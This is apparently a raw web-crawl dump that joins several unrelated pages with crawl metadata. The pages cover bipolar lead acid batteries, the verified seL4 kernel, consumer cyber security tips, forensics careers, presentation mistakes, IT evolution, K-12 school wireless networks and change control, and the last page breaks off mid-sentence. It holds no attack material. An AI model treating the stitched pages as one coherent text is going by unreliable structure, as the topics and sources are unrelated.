Acid Batteries: A Suitable Option Bipolar lead acid batteries are suitable for pulse power applications (very high power during milliseconds). The bipolar lead acid batteries in comparison to conventional lead acid batteries deliver higher power levels. They offer increased energy density while quadrupling power density in comparison to conventional lead acid batteries. This is made possible due to the fact that they have more cells spaced closer together. The bipolar plates that connect adjacent cells have a shorter current path and a larger surface area than the connections in conventional cells. This construction reduces the power loss that is normally caused due to the internal resistance of the cells. A number of advantages are offered by bipolar lead acid batteries as an energy storage device that it makes this technology suitable for use in battery electric / hybrid vehicles. Some of them are: - In a bipolar construction, much less material weight is needed for electronic conduction of the current in the grid and in the cell connections in comparison to conventional lead acid batteries. - A well established supply chain and manufacturing methodologies for lead acid batteries make it all the more reliable and provide an attractive cost equation. - Lead as a raw material is less expensive than the other metals used in certain other battery chemistries and is recyclable to a very large extent. - Lead acid batteries are abuse resistant to a large extent and the nominal voltage of 2V per cell reduces the number of cells needed for the entire battery string. Though they carry a lot of advantages, some aspects that leave a lot to be desired before successful commercialization and acceptance include: - A corrosion resistant, light weight, less expensive bipolar plate material is required. - The state of charge (SOC) during cycling is often in the range of 30-70 percent which increases the risk of sulfation and hence reduces the life of the battery. These aspects of the bipolar lead acid battery make it an attractive option for commercializing and implementation of the same for the existing automobiles with the 12V batteries and for the upcoming 42V electrical systems. With the implementation of 42V systems gaining ground and with the acceptance and implementation of hybrid / battery electric vehicles across the world, the demand for batteries is going to be on the rise and this gives an explosive opportunity to any new battery technology that is economically viable and technically feasible. Lead acid batteries have proven their performance levels for years together and the bipolar lead acid batteries in addition to the features of conventional lead acid batteries offer some additional features like delivering more power with significant reduction in weight in comparison to a conventional lead acid battery making it an exciting and attractive option for powering the hybrid / battery electric vehicles over other existing chemistries. For questions or comments regarding this article, please contact analyst at email@example.com. Stay tuned for new Frost & Sullivan Lead Acid Battery research! World Stationary, Motive, and Starting, Lighting, and Ignition Market studies are set to publish by the end of Quarter 2 2004.
<urn:uuid:fdd7e447-d8eb-4c4e-8af4-c2feea193d8e>
CC-MAIN-2017-04
https://www.frost.com/sublib/display-market-insight.do?id=17944096
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281084.84/warc/CC-MAIN-20170116095121-00011-ip-10-171-10-70.ec2.internal.warc.gz
en
0.937449
1,463
2.6875
3
Once again, our friends at sister brand Dr. Dobbs have provided me with yet more interesting blog fodder. In his editor's note in the daily Dr. Dobbs Update email, editorial director Jonathan Erickson discusses a breakthrough by Australian researchers who claimed to have developed the first "bug free" embedded software.Erickson notes that it's great to say you'd like to have bug free applications, but what happens when the underlying operating system is infested with bad code? Windows XP consists of approximately 40 million lines of code. Try finding the error in that tangle! To solve this problem, researchers at Open Kernel Labs (OK Labs) and Australia's National Information and Communications Technology Research Centre (NICTA) examined the correctness, reliability and security of the microkernel technology underlying OKL4, OK Labs' virtualization platform for mobile devices. Erickson says their approach was to "create a mathematical method for proving the correctness of the underlying source code, using formal logic and programmatic theorem checking. The verification process eliminated a wide range of exploitable errors, such as design flaws and common code-based errors, buffer overflows, null-point dereferences, memory leaks, arithmetic overflows, and exceptions." Once the work was done, OK Labs claimed it created "the world's first 100 percent verified 'bug free' embedded software." The researches said this helped establish a new level of software security and reliability for mission-critical applications, such as aerospace and defense. Additionally, this same verification process can be applied to business-critical applications in mobile telephony, business intelligence, and even mobile financial transactions. Erickson drills down a bit deeper: "All in all, the researchers verified approximately 7,500 lines of source code, proving over 10,000 intermediate theorems in over 200,000 lines of formal proof. The verified code base-the seL4 kernel (short for 'secure embedded L4')-is a third-generation microkernel, comprising 8,700 lines of C code and 600 lines of assembler, that runs on ARMv6 and x86 platforms. According to OK Labs, this is the first formal proof of functional correctness of a complete, general-purpose operating-system kernel. In this case, 'functional correctness' means that the implementation always strictly follows a high-level abstract specification of kernel behavior. This includes traditional design and implementation safety properties (such as the kernel will never crash, and it will never perform an unsafe operation). It also proves that programmers can predict precisely how the kernel will behave in every possible situation." I'm not pretending to understand the minutia of programming, but the implications of these findings seem to indicate a potential for greater reliability in mobile payments systems. OKL4 is OK Lab's virtualization application for mobile platforms. It sounds like virtualization for mobile is in its early stages, from what the company's website says, but still presents an interesting case for how mobile applications will evolve. OK Labs claims OKL4 enables mobile OEMs and semiconductor suppliers to incorporate "must-have features" into new mobile designs more quickly and less expensively. The idea is to reduce costs through hardware consolidation, allowing device manufacturers to "create smartphones at featurephone prices." So I decided to contact OK Labs and see exactly how this would help m-financial services. According to Rob McCammon, the VP of product management, Open Kernel Labs, the main benefit will come from strong security for the mobile channel. The operating system tends to be the most attractive target to hackers in any computerized system. They exploit certain software bugs that can compromise the security of the OS, he says. Once the operating system is compromised the rest of the software in the system is made vulnerable. "Mobile financial transactions require and benefit from strong security," he says. "Stronger security can lower the risk of financial loss from fraud or theft. Additionally, confident users of systems can lead to higher (and more secure) transactions." He concludes, "The completion of this research demonstrates that it is possible to create an operating system kernel or hypervisor that is free of a wide range of bugs. The presence of bugs in a system opens the door to attacks on a mobile phone's privileged mode software. The research shows that a higher level of security and confidence can be provided than was previously thought possible." The company hopes to bring this secure and verified "Microvisor" to market in its virtualization platforms for mobile OEMs, mobile network operators, and IT managers building mobile-to-enterprise applications. Since mobile financial services is still in its early stages (certainly in the U.S.), there haven't been many reports of exploits outside of eavesdropping on NFC signals in contactless payment transactions. This research, if broadly embraced, might help financial institutions start off on the right foot when developing mobile applications-with the security baked in from the start.
<urn:uuid:b5eb45c9-ee6a-40aa-aa40-bf8edf9b0c09>
CC-MAIN-2017-04
http://www.banktech.com/channels/aussies-claim-to-have-developed-bug-free-os-for-mobile-platforms/d/d-id/1293115
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280485.79/warc/CC-MAIN-20170116095120-00039-ip-10-171-10-70.ec2.internal.warc.gz
en
0.931916
1,003
2.5625
3
8 Simple Ways to Increase Your Cyber Security - 15th November 2016 - Posted by: Juan van Niekerk - Category: Security Cyber security has become a topic of conversation in the daily lives of just about anyone that has a mobile phone, PC, tablet or any device that connects to the internet. It is a very real concern that is, rightfully, taken very seriously as a breach of your device could have detrimental effects, such as your personal information falling into the wrong hands, viruses infecting your device or in extreme cases, even your identity being cloned. The only way to truly combat cyber attacks effectively is to educate yourself on the risks, preventative measures and counter measures that can be used in order to stay safe. But not everyone has the time or means to study a course such as EC-Council’s Certified Ethical Hacker. So what can you do to prevent your devices from being hacked or infected? Below we will have a look at some simple steps that you can take to ensure that you stay safe online. 1. Password protection The passwords that you choose for your devices, email accounts, online storage accounts and social network accounts such as Facebook are the first line of defence against cyber attacks. These should never be taken lightly and the proper steps should be taken to ensure that you choose a strong password that will not easily be guessed or cracked. Norton Identity Safe Password Generator will create highly secure passwords. - Since you will have multiple devices and sites that will require a password for you to log in, make sure that you use a different password for each. A password manager can help you keep track of which password to use where and will ensure that they are kept safe. - Ensure that, whichever device you may own, it is set to lock after a predetermined idle time. Use an unlock pin that is longer than 4 digits and can not easily be guessed (such as your birthday). - Using strong passwords to keep your accounts safe is always a good idea, but be sure to change them from time to time. 2. Manage your email accounts - Check your emails carefully before clicking on links that are included. This pertains especially to emails from your bank or other large institutions. Very often, these are phishing emails that endeavour to gain access to your personal information or to install malware on your device. Contact the institution directly or log into your account on their site if you are unsure whether it is a legitimate email. - If it sounds too good to be true, it probably is. Emails that promise prises that have been won (especially those that you haven’t entered for) and promises of large sums of money are a major source of scamming. - Never give out your personal information to anyone that you don’t fully trust. Always keep in mind that your personal information can be used against you to cause a great deal of damage. - Gone are the days where email scams are littered with bad grammar and poor spelling. The fact that a mail comes across as professional-sounding and legit doesn’t mean that it is. Always be sceptical when opening and reading your emails. Keep your emails protected with AVG AntiVitus FREE Encrypted information can only be read by yourself and the intended recipient. Always check that the URL that you are using starts with https://. This means that it is a secure connection and is often accompanied by a symbol of a padlock. This is especially important when visiting sites where you will be entering sensitive information such as credit card numbers, address details or banking pin numbers. 4. Social media security - Your social media account can be read like diary. Be sure to review your privacy settings every so often to ensure that only those that you feel comfortable with are able to see what you post. - Be careful about the information that you share on social networking sites. Unscrupulous individuals could very easily use that information against you (such as when your home will be unattended or when your car has a faulty security system). - Synchronise your social media account between your devices. This way you will be notified if there is strange activity on your account and corrective measures can be taken. 5. Install an antivirus program - Download an antivirus software program to keep your computer protected. Once you have done this, make sure that you install any updates that are released. - Do not install antivirus software from a vendor that you do not know or have not researched thoroughly. Look for well-known names and only download directly from their site. - If it is too expensive to install a fully licensed version of your antivirus, find a free but trustworthy alternative. Loo for software from companies such as Microsoft. AVG, AVAST and so forth. 6. Stay updated Software and apps often require updates that either improve their performance or ensure that new security threats are covered. Be aware of the fact that these updates are very important and may be the key to staying safe while utilising these functions. Also ensure that your system updates are installed as often as possible. These updates can occasionally be large and may use a lot of data, but it is well worth it in ensuring that your security is kept to an optimal level. - Stay very far away from torrent sites where music, movies and the like are available for download for free using a torrent client. It is very often the case that files uploaded to these sites are infected with Trojans, malware or adware that can cause serious damage to your system. - If you are unsure whether a site is a trustworthy source for downloads, do more research or, if no further information is available, avoid it altogether. - If your antivirus is not set to do so automatically, scan each file that you have downloaded before opening it. Your antivirus should pick up anything that may seem suspicious and will alert you to that fact. If you suspect that a file may be infected, instruct your antivirus to deal with it accordingly. 8. Stay informed There are a myriad of websites and publications that focus on cyber security and the risks that may be present at any given time. As cyber attacks become ever more complex and deviant in nature, so do the technologies that combat them. Be aware of any emerging technologies that can help you stay safe online and remember to keep a backup of your system, just in case you fall victim to a successful attack. This way your system can be restored to it’s uninfected state. Keep on top of security news and find a wealth of knowledge at the Kaspersky Lab Daily Blog. The internet is a massive source of information, entertainment, education and business, but it can also be the source of malicious attacks to those that are unaware of the presence and danger of cyber criminals. Be sure that you understand the steps that need to be taken in order to ensure your safety while online. It is always better to be safe rather than sorry.
<urn:uuid:d70bcbd9-64c8-4091-983e-c85da766c301>
CC-MAIN-2017-04
https://www.itonlinelearning.com/blog/8-simple-ways-to-increase-your-cyber-security/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280485.79/warc/CC-MAIN-20170116095120-00039-ip-10-171-10-70.ec2.internal.warc.gz
en
0.950419
1,425
2.90625
3
Forensics Investigators: Cybercrime Fighters Computer forensic investigation is the process of detecting hacking and other related cybercrime attacks and properly extracting evidence to report the crime, as well as conduct audits to prevent future attacks. Computer forensics is simply the application of computer investigation and analysis techniques in the interests of determining potential legal evidence. Evidence might be sought in a wide range of computer crime or misuse, including (but not limited to) fraud, theft of trade secrets and theft or destruction of intellectual property. Investigators can draw on an array of methods for discovering information that resides in a computer system or recovering deleted, encrypted or damaged file information. Securing and analyzing electronic evidence is a central theme in an ever-increasing number of conflict situations and criminal cases. Electronic evidence is critical in the following situations: - Disloyal employees. - Computer break-ins. - Possession of pornography. - Breach of contract. - Industrial espionage. - E-mail fraud. - Disputed dismissals. - Web page defacements. - Theft of company documents. A computer forensics investigator is responsible for recovering data from computers that can be used in the prosecution of a criminal or in gathering evidence of a crime. But contrary to public perception, a computer forensics investigation might include equipment beyond the normal computer, including cell phones, video recorders, thumb drives, BlackBerries, PDAs and MP3 players. Computer forensics enables the systematic and careful identification of evidence in computer-related crime and abuse cases. This might range from tracing the tracks of a hacker through a client’s systems to tracing the originator of defamatory e-mails to recovering signs of fraud. Many computer forensics investigators are law enforcement officers or are employed by police departments. In smaller cities, however, they might be private computer experts whom the local police force uses on an as-needed basis. Computer forensic investigators might be required to testify in court to explain their role in the evidence-gathering process and to detail the evidence-recovery procedure used in that case. The need for forensics investigators is becoming very important. With the growth in the general digital forensics area, the need for a good solution for investigators is on the rise. One common trend among law enforcement agencies is that corporations worldwide try not to report any computer abuse to which they might have been subject. Why? According to a recent CSI/FBI report, this is because most of them are concerned that any such report may lead to a leak, and as a result, they might be susceptible to attack from their competitors in the court of public opinion. They are also concerned that the negative publicity might hurt their stock prices. What is the Solution? One possible answer is to hire internal computer-hacking forensics investigators. The fact that a corporation has an internal team that is trained and certified to deal with the art of computer forensics will significantly reduce the risk of employees trying to prey on their internal systems. Another benefit is that internally trained and certified personnel will cost a corporation much less than a typical investigation by a consultant. A computer forensic investigator might be called in if the information for which the authorities are looking has been hidden on or erased from a computer. Despite being deleted, the investigator can retrieve all or part of the evidence using specialized recovery programs and the computer’s hard drive. Forensics investigators also can work to crack or decode encryption programs that prevent information stored on the computer from being accessed. This information might be pictures, documents or other sources such as spreadsheets or databases. Computer forensics investigators also must have good working knowledge of computer construction, as well as hard drive processes and data recovery. They have to have a great deal of patience and should be willing to work for long or odd hours to try to recover information from computers that might have been erased or damaged. Understanding networking, encryption and computer crime is also important to this career. To prepare a person to be a forensics investigator is no easy task. There are many sides to a good investigator, from analytical skills to technical knowledge. Potential investigators should study and understand the crimes or incidents they will be investigating. For instance, they ought to have good working knowledge of ethical hacking skills and possess the Certified Ethical Hacker certification, which is just one of many that will aid in creating the most well-rounded investigator. There are quite a few certifications available, but those who seek to become computer forensics investigators must be able to distinguish between vendor-neutral and vendor-based certifications. Both will help create the best forensic investigator. EC-Council offers a vendor-neutral computer hacking forensic investigator program that prepares individuals to become forensics investigators. But upon the completion of this certification, candidates should pursue some of the specialized vendor-based certification that will allow them to be adequately certified and trained in products and techniques. For instance, Paraben Corp. offer multiple tiers of training associated with the seizure, analysis and presentation of data associated with mobile devices. Although this is a vendor-based certification, it still contributes to crucial skills that forensic investigators will need. Additionally, there are many other vendors that have proprietary software or equipment, including Guidance Software, which both law enforcement agencies and corporations use a great deal. Before individuals attempt any of these trainings, however, they should possess critical information about networking, ethical hacking and a deep understanding of forensics tools and procedures. Jay Bavisi is the president of EC-Council. He can be reached at editor (at) certmag (dot) com.
<urn:uuid:9e55b603-7436-4b33-a819-b7b974e50669>
CC-MAIN-2017-04
http://certmag.com/forensics-investigators-cybercrime-fighters/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280835.22/warc/CC-MAIN-20170116095120-00369-ip-10-171-10-70.ec2.internal.warc.gz
en
0.93957
1,143
2.828125
3
When someone tells you that you need to attend a technical presentation, what is the first thing that goes through your mind? Do you imagine yourself watching a parade of numbers, statistics, and data points? Do you imagine an unending list of boring and unreadable PowerPoint slides? Unfortunately, this is frequently the case. Furthermore you will often see the same mistakes from one speaker to another. You can distinguish yourself from the majority of other speakers by avoiding the same common mistakes. Drawing attention to your anxiety - Too often, an inexperienced speaker will use one of these sentences (or variations thereof) to begin the speech. Generally, the speaker does so to apologize and to get clemency from the audience. In still further situations, that speaker will apologize every time he or she makes a mistake and will offer some excuse. The audience will notice on its own that you are ill at ease. When you mention it over and over, you only encourage them to pay attention to that fact. How do you avoid this issue? Here are a few solutions: Forgetting the audience - That is, forgetting to maintain constant contact with the audience. Speaking to a group is like a dialogue, even if there is only one person doing the speaking and the rest of the audience is only listening. Your role as a speaker is to make sure that your audience is following you throughout your speech. When you speak, maintain visual contact with your audience. Don't get distracted by your PowerPoint slides, your notes, or anything else that takes your attention away from your audience. When you maintain visual contact with the audience, you can see in their eyes and in their posture if they understand, if they are paying attention, or if they are bored. This will allow you to adjust more easily to their state of mind. Incorrect use of PowerPoint - As a presentation tool PowerPoint is overused. Furthermore, it is often improperly used. It is used to show large amounts of text when it should be used to display visual information. It's used as a memory jogger instead of a presentation aid. All the emphasis is put on the PowerPoint slides even though the slides should only add to the presentation. Most audiences are sick of PowerPoint presentations nevertheless many speakers still believe that PowerPoint adds professionalism to their speech. This is only true if it is used effectively. Otherwise, it makes you look like an amateur. Less is more is a good philosophy when using PowerPoint. There is elegance in simplicity. A simple slide is more evocative than an over-charged one. A slide with no animation is more appreciated than a slide that uses all of PowerPoint's special effects.
<urn:uuid:155a2ff6-6c67-47c4-90ed-9c5addd7b468>
CC-MAIN-2017-04
http://www.cioupdate.com/insights/article.php/3822231/Five-Mistakes-To-Avoid-During-a-Technical-Presentation.htm
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280835.22/warc/CC-MAIN-20170116095120-00369-ip-10-171-10-70.ec2.internal.warc.gz
en
0.945927
534
2.625
3
The Evolution of IT By John Parkinson If you look at the history of evolution in natural species (assuming you believe it happens, that is), you see two sets of forces at work: both long- and short-term incremental improvements through somewhat random mixing of characteristics (survival of the fittest--or more probably, the best adaptive) interspersed with rare but significant "wipe the slate clean" extinction events (I think there are four or five in the paleontological record) that change the options available in the incremental landscape in fundamental ways. Even so, some species persist across major evolutionary discontinuities. Sharks are virtually unchanged for 300 million years, cockroaches for at least 100 million. Paleo-biology calls these "keystone" species because they anchor large parts of the ecosystem across discontinuities and form a nucleus for rebuilding. If you are willing to draw an analogy with the IT ecosystem (after all, we evolve a lot faster than biology and burn a lot more unsuccessful "species" along the way) you can see that (a) we are probably due for an extinction-event-like discontinuity sometime soon and (b) we have some candidates for both shark and cockroach as keystone species. The looming discontinuity is the energy cycle and the limits to how much energy we can invest in our IT infrastructure. We will see this manifested in the shift to cloud computing, but that's going to make the problem worse, not better, because of the concentration of energy required for large-scale data centers. A lot of today's top technology species, all evolved amidst abundant energy, will be wiped away by this. Mainframe = shark (not dinosaur, as it is so often characterized). Not only is today's mainframe a linear descendant of the original design from 40 years ago, it's successfully absorbed the innovations (DNA) of many other "species" along the way, growing stronger and more dominant in the process. It's also remarkable energy efficient. As for the cockroach? The microprocessor fits here. Microprocessors are everywhere, have mutated into many kinds, seemingly have minds of their own and are very hard to get rid of. Of course, they are also a critical part of the technology ecosystem (even mainframes use them) and in the right circumstances, they create a great deal of value. John Parkinson is CIO of TransUnion. To read his columns for CIO Insight, click here.
<urn:uuid:779d843a-fc7d-402f-bbbf-2e0ae7be51d0>
CC-MAIN-2017-04
http://blogs.cioinsight.com/it-management/evolution-of-it.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284270.95/warc/CC-MAIN-20170116095124-00093-ip-10-171-10-70.ec2.internal.warc.gz
en
0.936362
504
2.703125
3
Education - K-12 Schools Today, the majority of classrooms are not equipped with desk phones. The existing voice system for most K-12 environments is a traditional PBX (private branch exchange), which provides a basic telecommunications link from the main office to the world outside of the school. This system typically does not allow teachers to communicate with each other or enable them to be reached directly by parents. It also does not let mobile staff, such as security and maintenance personnel, communicate with teachers or office staff. In addition, most schools do not have the budget to upgrade their existing PBX and install new phone lines for every classroom. And even if they did, the outdated infrastructure probably would not support mobile users. Schools also face the serious need to improve school safety and security. One of the major factors in these issues is inadequate communication. A teacher that is unable to react quickly and effectively to a minor problem could see it balloon into a major crisis. Should that teacher be cut off from the rest of the school in a temporary classroom or the playing fields lot, the problem is greatly exacerbated. For these reasons and more, wireless voice is a clear choice for educational institutions. Wireless technology can be used to extend voice services to areas where it is currently unavailable. Important features for K-12 schools: - Can provide wireless extensions to any voice platform - Wi-Fi or DECT - Wireless handsets can receive urgent text messages (eg fire, duress alarms, evacuation) - Range of handsets to suit different applications (eg admin, outdoor, staff protection/duress) Mobile computing initiatives are changing the way children learn in K-12 environments. Laptop carts, video learning and one-to-one computing programs have combined with small IT staffs and shrinking budgets to drive the need for a reliable and intelligent wireless network. A reliable network can mean the difference between wasted class time and a session that rapidly engages students in a rich educational experience. Fortinet makes wireless networks that simply work, enabling teachers to teach instead of dealing with IT issues. Designed for the All-Wireless School From the beginning, Fortinet designed its network for the All-Wireless Enterprise: an organisation that never needs to depend on wires for connectivity. For K-12 institutions, this means that a whole class of students can log on anywhere while data, voice and video are carried reliably. With industry-leading virtualized Wireless LAN technology, Fortinet delivers the most predictable and highest performance wireless network. Whether covering class rooms, assembly halls or libraries, Fortinet provides the fastest deployment at the lowest cost. - Wireless Like Wire. Fortinet's virtualized Wireless LAN offers all the performance that users expect from wired Ethernet combined with the mobility of cellular. - Quality of Service. Data applications get all the bandwidth they need while toll-quality voice is assured. - Fewer Access Points. Fortinet requires fewer access points on your campus than other solutions, stretching your IT dollars further and simplifying maintenance. - Airtime Fairness. Each client in a packed library gets a fair share of the airwaves, letting legacy clients coexist peacefully with the latest 802.11n devices. - Strong Security and Simple Management. The network takes control of every device's behavior, ensuring that applications get the resources they need and attackers are blocked before they connect. Important features for K-12 schools: - Support for wireless data, voice and video with QOS - High user densities - Ability to provide wireless coverage over large areas - Simple to install / simple to manage - Limited IT resources (inhouse expertise and budget) - Support for simultaneous multiple: - Wi-Fi clients (a/b/g/n) - Fortinet Airtime Fairness means WLAN performance is not influenced by slower devices - Devices (notebooks / netbooks/ iPhones/ smartphones) - Operating system Windows (XP, 7), Apple etc IP Telephony / UC Both the cost of wiring and maintaining a traditional PABX has historically been cost prohibitive for schools to provide telephones throughout a school. With heightened security risks, increasing demands from parents to communicate with teachers and needs to improve productivity, the model of limited voice capability in a school is rapidly becoming a thing of the past. As most schools adopt LAN data networks, the opportunity arises for schools to address these demands with a voice over IP (VoIP) telephony solution. IP Telephony yields several benefits to K-12 schools, including: - Lower total cost of ownership: IP Telephony lets schools leverage their existing data infrastructure to drive network costs down and cost effectively deploy telephones in classrooms. IP Telephony also allows schools to lower network management and maintenance costs by moving them to a single network environment. Lastly, IP Telephony gives schools the ability to share applications across the network thereby cost effectively enabling features and functionality, which were not previously available or affordable. - Improve staff productivity and reduce costs: Relevant and intuitive applications such as Outlook integration for voicemail and fax enable teachers to be more productive and responsive to parents and fellow staff members. - Enhance School Safety: Having an accessible IP PBX allows school administrators to proactively disseminate critical information to staff and parents during an emergency. IP Telephony also allows school administrators to communicate with teachers and staff anywhere on school grounds thereby dramatically improving response times and improving outcomes during emergencies. Important features for K-12 schools: - Outlook integration - Voicemail / fax to e-mail - manage calls from parents and other teachers from office or from home, or from smartphone (iPhone, Blackberry etc) - Support for a wide range of SIP voice and video phones - Presence and chat via PC screen shows teachers availability to take calls - Supports wireless extensions for users outside of the classroom - Built-in conference bridge allows multiple teachers to hold telephone meetings - Point and click - easy call handling for reception to transfer calls to teachers - Supports both traditional (analogue or ISND) and VoIP calls - Call recording and monitoring - Call reporting and logging Network Access / Security Education is a segment which has specialised needs for public Internet access. An educational campus community demands high levels of access to both the public internet and the institution’s internal networks and requires stringent control over management of usage and bandwidth. Both wired and wireless connection availability is expected in almost every building on campus, labs, libraries, and residence halls. Examples of stakeholders in need for a broadband internet connection are students, faculty, staff and official visitors. Managing the Bring Your Own Device (BYOD) phenomenon The challenges in managing network access are being amplified by the new generation of personal smart devices including iPhones, tablets and other devices that students and staff want to use on campus. The BYOD phenomenon is seeing a flood of diverse Wi-Fi® devices entering networks claiming their share of WLAN resources. Networks must be prepared to deliver secure, scalable wireless network access to a diversity of devices and users Wireless networks should be capable of enabling one-click self provisioning of client devices for secure 802.1x connectivity. BYOD Guest Access Management Requirements: - Easy-to-use, one-click self-provisioning capabilities - Centralised, customisable portals for guest authentication - Automatic notification services by email or SMS message - Powerful reporting, auditing and customisation capabilities - Secure role-based access with granular policy management enabling differentiated levels of access Network Access Control (NAC) Educational institutions have security demands that are unique. K-12 school districts with shared computers and visiting laptops; boarding schools with resident students and faculty. colleges and universities with a multitude of resident and commuter students associated with computers, smart phones and game consoles - all need secure access to the network. Add the visiting guests, faculty, lecturers and parents, as well as a myriad of IP-enabled devices and the need for Network Security becomes a necessity - Register computers, game consoles, PDAs, and other networked devices. - Check computers for up-to-date OS patches, anti-virus and anti-spyware protection, and restricted applications such as P2P. - Allow users to remediate any compliance issues without having to engage IT staff. - Add access security to your wireless deployments. - Track all network access and usage. Broadcast important messages and emergency notifications instantaneously to all network users.
<urn:uuid:6fa46813-e932-497b-9867-1674a7fc28e8>
CC-MAIN-2017-04
http://www.wavelink.com.au/industry-solutions/education/k-12-schools.php
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284270.95/warc/CC-MAIN-20170116095124-00093-ip-10-171-10-70.ec2.internal.warc.gz
en
0.922222
1,744
2.875
3
Counter-intuitively, a Harvard engineering lab specializing in research on ultra-small robots has adapted cutting-(paper's)edge technology from origami and children's pop-up books into a process designed to make it possible to mass-produce tiny flying robots at a cost that might make it practical to manufacture more than one. The process developed at the Harvard Microrobotics Laboratory is necessary to keep costs and logistics under control as the lab moves into experiments involving hives full of its RoboBee flying microbot, rather than just one or two at a time. The Microrobotics Lab specializes in developing unmanned aerial vehicles (UAVs) designed to operate in much the same way as Predator spy drones shrunk down to the size of a bug. RoboBee is one of a number of engineering research projects sponsored by defense contractor BAE Systems, which is working for the U.S. military to develop spy drones too small to be detected easily but capable enough to be piloted into buildings, training camps and other areas inaccessible to aircraft the size of a sedan. Harvard researchers project the robot bee can also be used to pollinate fields of crops (putting real bees out of jobs) as well as civilian surveillance missions such as search-and-rescue, traffic monitoring and exploration of hazardous environments. The problem with developing micro-robots isn't just the size of the whole unit; it's all the things that go into making it possible and practical. In addition to the trick of designing a semi-autonomous bug-sized robot, researchers have to design components small enough that their size, weight and capacity don't pin the RoboBee to the ground or shorten its flying range so much that it would be useless as either a drone or a spy. So the Harvard lab spends as much time developing new batteries, smart sensors and better programming that can run on processors small and light enough not to overburden a machine with about the same lifting capacity as a real bee, according to lab publicity documents. They also have to find materials and manufacturing techniques that don't make producing each microrobot so slow and expensive that they waste all their time and grant money. The manufacturing process involves pressing 18 layers of pre-cut carbon fiber into a single joined structure that expands when you pull on it until the whole robot unfolds. The RoboBee fold-out prototype is about the size of a quarter but weighs one-sixty-third as much. It has 137 joints, 22 of which fold, and 52 spots on which circuitry or components can be welded. The layered manufacturing process is similar to the way circuit boards are made: each layer is printed, cut or folded with a separate set of circuits or components that all connect neatly when the layers are all pressed together into a single sheet at the end of the process. Since the technology is the same as that used by circuit-board makers, machinery for making the fold-out robo-bugs is cheap and plentiful, cutting costs down even further compared to hand assembly, which had been the only other option. Automating the technique "takes what is a craft, an artisanal process, and transforms it for automated mass production," according to graduate student Pratheev Sreetharan, who co-developed the technique. It also makes it possible to design a whole machine with integrated electronics, manufacture them flat and make them work as fully three-dimensional objects just by pulling up on the stacked disks until the robot pops into shape, according to Rob Wood, an Associate Professor of Electrical Engineering at SEAS and a Core Faculty Member at the Wyss Institute for Biologically Inspired Engineering at Harvard. The technique applies to many types of small device, not just RoboBees. "We can generate full systems in any three-dimensional shape," Wood says. "We've also demonstrated that we can create self-assembling devices by including pre-stressed materials." If a new bee needs more components, more features, it's only necessary to laser-cut a few additional layers of Kevlar, carbon-fiber, polymers, ceramics or any other material, then slip them into the correct order in the stack of layered, pre-cut parts. The precision of the design, production and assembly of components is so precise, the lab can literally not measure how tight the tolerances are on its final product, "The alignment is now better than we can currently measure," Sreetharan, said."I've verified it to better than 5 microns everywhere, and we've gone from a 15% yield to—well, I don't think I've ever had a failure." Though the process is specific to the RoboBee, it and its (literally) unmeasurably fine tolerances for component manufacture can be applied to almost any other tiny machine as well The full process will be published in the March issue of the Journal of Micromechanics and Microengineering. The U.S. Army Research Laboratory and National Science Foundation both contributed grant money to fund the RoboBee program, so they'd get first dibs on any end product. The Harvard Office of Technology Development is also looking for a way to commercialize the RoboBee. So it's possible that within a relatively few years you'll be able to buy a flat disk packaged in paper like a book of stamps from a RoboVending machine and pull up on a string to unfold an internally powered, fully functioning remote-controlled flying robot. Who cares if there would be an actual, practical use for it? Get one to look under the couch for the remote or harass the cat. If they're as cheap to make and distribute as they should be using this approach, it would be easy to justify buying one just for its cool-gadget rating (10+) rather than its practicality (rating: 3ish). My only hesitation is from the horror-movie images that spring to mind when Wood and Sreetharan talk about experimenting with "swarms" of RoboBees. But as long as Harvard is sure the RoboBees couldn't find nourishment or energy by, say, swarming over and devouring their owners, I'm sure I could be convinced to give the bees a try. Read more of Kevin Fogarty's CoreIT blog and follow the latest IT news at ITworld. Follow Kevin on Twitter at @KevinFogarty. For the latest IT news, analysis and how-tos, follow ITworld on Twitter and Facebook.
<urn:uuid:b9fa63c9-8aaa-4112-a951-e2b6fdd28250>
CC-MAIN-2017-04
http://www.itworld.com/article/2729550/mobile/flying-robot-made-cheap--easy-enough-to-buy-from-vending-machines.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280280.6/warc/CC-MAIN-20170116095120-00241-ip-10-171-10-70.ec2.internal.warc.gz
en
0.957514
1,346
3.765625
4
With regard to routing, which of these is a way to tell a router about a network to which it is not directly connected? - Default Gateway - Dynamic Routing Protocol - Default Route A router can be configured to run a dynamic routing protocol so that it can learn from other routers about networks to which it is not directly connected.
<urn:uuid:7b5db2b3-f595-41c3-9262-21bf6b3e57c3>
CC-MAIN-2017-04
http://blog.globalknowledge.com/2013/01/07/ccna-exam-prep-question-of-the-week-21/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284405.58/warc/CC-MAIN-20170116095124-00359-ip-10-171-10-70.ec2.internal.warc.gz
en
0.933966
70
2.640625
3
When thinking about workflow and business process management, one of the major topics involved is Change Control. What Is Change Control? “Change Control is a systematic approach to managing all changes made to a product or a system. The purpose is to ensure that no unnecessary changes are made, that all changes are documented, that services are not unnecessarily disrupted and that resources are used efficiently.” While the concept of change control may seem simple enough, many businesses struggle with how to implement change efficiently. Many documents have been written and solutions created to control the change process. As part of the ITIL best practices framework, there’s even an entire discipline devoted to change control, while solution providers have developed suites of product offerings designed specifically to control the change process. All cover the following basics: • Define the change • Analyze the impact of the change • Authorize the change • Report on the results of the change From these four steps, change control processes can be defined and built for all operational areas of your business. Because each business area serves a different purpose, the basic process itself must be flexible to accommodate the various areas. This may include different steps, based on approval levels or impacts of the change. Areas Impacted by Change Control Here are several areas that change control may impact: 1. IT Change Change control is frequently identified in an IT environment, with the most focus and the widest range of articles and software devoted to it. It also covers a broad range of processes including: user access, hardware or server changes, and service implementation. Andy Hogg in ComputerWeekly.com says, “Within the IT world, change is inevitable. We have the constant release of security patches, hot fixes, service packs, new versions, changes to code, hardware replacements, configuration changes, modifications to reference data – the list goes on.” He further states that “70-80% of service interruptions are 